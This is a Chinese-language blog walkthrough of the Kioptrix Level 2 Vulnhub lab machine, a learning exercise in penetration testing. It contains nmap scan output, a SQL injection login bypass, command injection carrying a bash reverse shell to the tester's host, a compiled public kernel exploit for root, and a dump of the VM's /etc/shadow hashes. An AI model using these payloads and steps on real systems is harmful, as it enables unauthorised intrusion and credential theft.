Kioptrix 2 Walkthrough (Vulnhub)

2020/09/01 22:35 · Kioptrix · 原创文章 · 2,814 · 0

简介 

KIOPTRIX VM映像挑战:
这个Kioptrix VM映像很容易挑战。游戏的目的是通过任何可能的方式获得root用户访问权限(除了实际入侵VM服务器或播放器外)。这些游戏的目的是学习漏洞评估和利用中的基本工具和技术。成功完成挑战的方法不止一种。
资料来源:http : //www.kioptrix.com/blog/? page_id= 135
资料来源:http://www.kioptrix.com/blog/? p = 49
这是#2的第二个版本。首次发布的Web应用程序存在错误
2012年2月9日:重新发布
2011年2月11日:原始版本

环境搭建

访问 https://www.vulnhub.com/entry/kioptrix-level-1-1,22/下载vm镜像

三、实战渗透 

nmap扫描目标网段寻找主机 

xiaoze@bad:~$ nmap 192.168.2.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 03:15 CST
Nmap scan report for RM2100.lan (192.168.2.1)
Host is up (0.0037s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
1080/tcp open  socks

Nmap scan report for chuangmi-plug-v3_miap5EDA.lan (192.168.2.100)
Host is up (0.014s latency).
All 1000 scanned ports on chuangmi-plug-v3_miap5EDA.lan (192.168.2.100) are closed

Nmap scan report for lumi-acpartner-mcn02_miap9740.lan (192.168.2.108)
Host is up (0.0078s latency).
All 1000 scanned ports on lumi-acpartner-mcn02_miap9740.lan (192.168.2.108) are closed

Nmap scan report for MiAiSoundbox.lan (192.168.2.117)
Host is up (0.0036s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
53/tcp   open  domain
9999/tcp open  abyss

Nmap scan report for zedeMacBook-Pro.lan (192.168.2.120)
Host is up (0.30s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for bad.lan (192.168.2.133)
Host is up (0.00027s latency).
All 1000 scanned ports on bad.lan (192.168.2.133) are closed

Nmap scan report for lumi-gateway-v3_miio87687718.lan (192.168.2.153)
Host is up (0.0095s latency).
All 1000 scanned ports on lumi-gateway-v3_miio87687718.lan (192.168.2.153) are closed

Nmap scan report for 192.168.2.161
Host is up (0.0028s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
3306/tcp open  mysql

Nmap scan report for MIX2S-ouyangxiaozede.lan (192.168.2.235)
Host is up (0.0060s latency).
All 1000 scanned ports on MIX2S-ouyangxiaozede.lan (192.168.2.235) are closed

Nmap done: 256 IP addresses (9 hosts up) scanned in 18.32 seconds

确定目标主机为192.18.2.161 

xiaoze@bad:~$ sudo nmap -sS -sV -O  192.168.2.161
[sudo] xiaoze 的密码:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 03:20 CST
Nmap scan report for 192.168.2.161
Host is up (0.00086s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind    2 (RPC #100000)
443/tcp  open  ssl/https?
631/tcp  open  ipp        CUPS 1.1
3306/tcp open  mysql      MySQL (unauthorized)
MAC Address: 00:0C:29:E1:BD:4F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.10 seconds

发现80端口开放web服务,作为一个web狗,遇到web才是解题思路,访问网站http://192.168.2.161,访问之后是这样的,

admin:admin弱口令登陆密码错误,万能密码admin' or 1=1 -- -登陆成功

输入框里面输入baidu.com;ls -la 发现可以执行ls -la命令。

使用nc反弹shell, 

127.0.0.1; bash -i >& /dev/tcp/192.168.2.133/8877 0>&1

shell 成功反弹,查询linux内核版本。 

bash-3.00uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
bash-3.00 id
uid=48(apache) gid=48(apache) groups=48(apache)

linux提权,在exploit里面寻找有没有对应的exp可以提权

google 一下发现https://www.exploit-db.com/exploits/9542这个可以提权

wget下载就好,我这边无法下载,通过本地web下载的 

bash-3.00gcc 9542.c -o exploit
9542.c:109:28: warning: no newline at end of file
bash-3.00 chmod 777 exploit
bash-3.00./exploit
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00# whoami
root
sh-3.00# cat /etc/shadow
root:1FTpMLT88VdzDQTTcksukSKMLRSVlc.:14529:0:99999:7:::
bin:*:14525:0:99999:7:::
daemon:*:14525:0:99999:7:::
adm:*:14525:0:99999:7:::
lp:*:14525:0:99999:7:::
sync:*:14525:0:99999:7:::
shutdown:*:14525:0:99999:7:::
halt:*:14525:0:99999:7:::
mail:*:14525:0:99999:7:::
news:*:14525:0:99999:7:::
uucp:*:14525:0:99999:7:::
operator:*:14525:0:99999:7:::
games:*:14525:0:99999:7:::
gopher:*:14525:0:99999:7:::
ftp:*:14525:0:99999:7:::
nobody:*:14525:0:99999:7:::
dbus:!!:14525:0:99999:7:::
vcsa:!!:14525:0:99999:7:::
rpm:!!:14525:0:99999:7:::
haldaemon:!!:14525:0:99999:7:::
netdump:!!:14525:0:99999:7:::
nscd:!!:14525:0:99999:7:::
sshd:!!:14525:0:99999:7:::
rpc:!!:14525:0:99999:7:::
mailnull:!!:14525:0:99999:7:::
smmsp:!!:14525:0:99999:7:::
rpcuser:!!:14525:0:99999:7:::
nfsnobody:!!:14525:0:99999:7:::
pcap:!!:14525:0:99999:7:::
apache:!!:14525:0:99999:7:::
squid:!!:14525:0:99999:7:::
webalizer:!!:14525:0:99999:7:::
xfs:!!:14525:0:99999:7:::
ntp:!!:14525:0:99999:7:::
pegasus:!!:14525:0:99999:7:::
mysql:!!:14525::::::
john:1wk7kHI5I2kNTw6ncQQCecJ.5b8xTL1:14525:0:99999:7:::
harold:17d.sVxgm3MYWsHDv0F/LP.mjL9lp/1:14529:0:99999:7:::
sh-3.00#

您可能感兴趣的文章

本文地址:http://www.ouyangxiaoze.com/2020/09/663.html
文章标签: ,   ,  
版权声明:本文为原创文章,版权归 欧阳小泽 所有,欢迎分享本文,转载请保留出处!

文件下载

上一篇:

 发表评论


表情